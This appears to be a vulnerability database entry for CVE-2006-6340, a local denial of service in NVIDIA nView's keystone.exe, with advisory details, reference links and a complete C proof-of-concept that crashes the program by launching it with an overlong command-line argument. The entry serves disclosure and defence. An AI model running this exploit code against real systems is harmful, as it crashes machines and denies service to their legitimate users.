Nvidia NView 'Keystone.EXE' Local Denial of Service Vulnerability

Vulnerability ID: 1111643 Vulnerability type: Boundary condition error
Published: 2006-11-23 Updated: 2006-12-08
CVE ID: CVE-2006-6340 CNNVD-ID: CNNVD-200612-087
Platform: Windows CVSS score: 5.0
|Vulnerability Source
https://www.exploit-db.com/exploits/29170
https://cxsecurity.com/issue/WLB-2006120045
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-087
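|Vulnerability Details
keystone.exe in NVIDIA nView has a local denial-of-service vulnerability. Remote attackers can cause a denial of service via a long command-line argument. Note: it is unclear whether this issue crosses security boundaries. If it does not, this issue is not a vulnerability.
|Exploit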
source: http://www.securityfocus.com/bid/21260/info

NVIDIA nView is prone to a local denial-of-service vulnerability.

An attacker can exploit this issue to crash the affected computer, denying service to legitimate users.

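/*
NVIDIA nView (keystone) local Denial Of service
(c)oded By Hessam-x / www.Hessamx.net
*/

#include <stdio.h>
#include <stdlib.h>   /* malloc, free */
#include <string.h>
#include <windows.h>

int main(void)
{
    char junk[] = "a";
    char box[650];
    char *buf;
    int i;

    printf("-:: NVIDIA nView (keystone) Denial Of service \n");
    printf("-:: Coded By Hessam-x / www.hessamx.net \n");

    /* Build the long argument: 601 'a' characters. */
    strcpy(box, "a");
    for (i = 0; i < 600; i++) {
        strcat(box, junk);
    }

    buf = (char *) malloc(650);
    if (buf == NULL) {
        return 1;
    }

    /* Command line: "keystone", a tab, then the long argument. */
    strcpy(buf, "keystone\t");
    strcat(buf, box);
    buf[650 - 1] = '\0';

    /* Launch keystone with the long command-line argument. */
    WinExec(buf, 0);
    free(buf);
    return 0;
}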
|References

Source: BUGTRAQ
Name: 20061123 NVIDIA nView (keystone) local Denial Of service
Link: http://www.securityfocus.com/archive/1/archive/1/452439/100/100/threaded
Source: BID
Name: 21260
Link: http://www.securityfocus.com/bid/21260
Source: SREASON
Name: 1973
Link: http://securityreason.com/securityalert/1973